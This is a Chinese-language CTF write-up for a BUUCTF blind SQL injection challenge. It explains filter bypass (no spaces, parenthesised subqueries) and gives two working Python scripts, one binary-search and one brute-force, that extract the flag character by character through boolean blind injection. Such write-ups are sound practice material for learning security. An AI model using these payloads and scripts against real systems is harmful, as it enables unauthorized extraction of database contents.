只能说确实是有点巧,昨天说等碰到盲注的题目的时候再使用二分法脚本来爆flag,今天就碰到了。
话不多说,直接开整。
开启题目,都给出提示了All You Want Is In Table ‘flag’ and the column is ‘flag’,然后就是找注入点。这整个页面就只有一个输入框,这就不用多想了,先试试。
这个应该就是存在注入点了(我也不知道这样判断的对不对)。
按照正常的思路,就是找到注入点后就看能不能使其闭合了,但没办法过滤了太多了,我们使用bp看一下过滤了哪些东西。
可以看到这里过滤了很多东西,空格,and,&&。但是^没有过滤,这个时候尝试使用异或盲注看看能不能。
看到这里确实是可以的,但是当我们输入id=0的时候也会显示这个错误,所以我们就不需要使用异或了,直接就是布尔盲注就行了。(我不知道这样说对不对)。
id=(ascii(substr((select(flag)from(flag)),1,1))>100)
好了,到这里就可以直接上脚本了。我这里有两个脚本一个二分法的,一个就是直接暴力比较的脚本,有需要可以自取。
'''二分法,时间快'''
import requests
import time
url = "http://ac62636d-742f-46f3-9a4f-250ad88dd14f.node4.buuoj.cn:81/"
payload = {
"id" : ""
}
flag = ""
for i in range(1,200): #这里调多大都不会有影响,应为判断结束的条件是用空格判断的
time.sleep(0.06) #这里为什么要加time.sleep可以看前面的文章,就不多说了
head = 33
tail =130
mid = (head + tail)//2
while(head < tail):
payload["id"] = "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)
res = requests.post(url,data=payload)
time.sleep(0.04)
# print(payload)
if "Hello" in res.text:
head = mid + 1
else:
tail = mid
mid = (head + tail)//2
if(chr(mid)==" "):
break
flag += chr(mid)
print(flag)
print("flag: " ,flag)
# 直接爆破,时间慢
'''
import requests
import string
import time
flag = ''
strings = string.printable
# print(strings)
url = 'http://3cf53c84-01b1-4562-9515-0309c4a297d2.node4.buuoj.cn:81/'
for num in range(1,50):
time.sleep(0.06)
for i in strings:
payload = '(ascii(substr((select(flag)from(flag)),{0},1))={1})'.format(num,ord(i))
post_data={"id":payload}
res = requests.post(url,data=post_data,timeout=5)
time.sleep(0.04)
if 'Hello' in res.text:
flag += i
print(flag)
else:
continue
print(flag)
'''
使用二分法就是快呀,大家可以运行这两个脚本比较一下,我刚开始是用第二个的,后面用了第一个。这两个就不是一个级别的,这里我编写二分法脚本的时候也出现了一点问题,然后看其他师傅的文章借鉴了一下。总的来说题目不是很难,就算没写出来,一边看wp一边写脚本也是一种收获。
总结:也没什么说的,加油吧。